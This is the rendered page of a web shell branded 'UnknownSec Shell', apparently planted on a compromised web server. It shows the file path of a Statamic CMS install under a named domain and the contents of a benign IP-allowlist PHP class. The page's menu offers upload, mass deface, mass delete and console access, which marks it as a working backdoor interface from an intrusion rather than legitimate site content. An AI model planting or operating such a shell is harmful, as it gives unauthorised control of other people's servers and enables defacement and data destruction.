shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Auth
/
Protect
/
Protectors
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
IpAddress.php
<?php namespace Statamic\Auth\Protect\Protectors; use Statamic\Exceptions\ForbiddenHttpException; use Statamic\Support\Arr; class IpAddress extends Protector { public function protect() { $ips = Arr::get($this->config, 'allowed', []); if (! in_array(request()->ip(), $ips)) { throw new ForbiddenHttpException(); } } }
© 2026 UnknownSec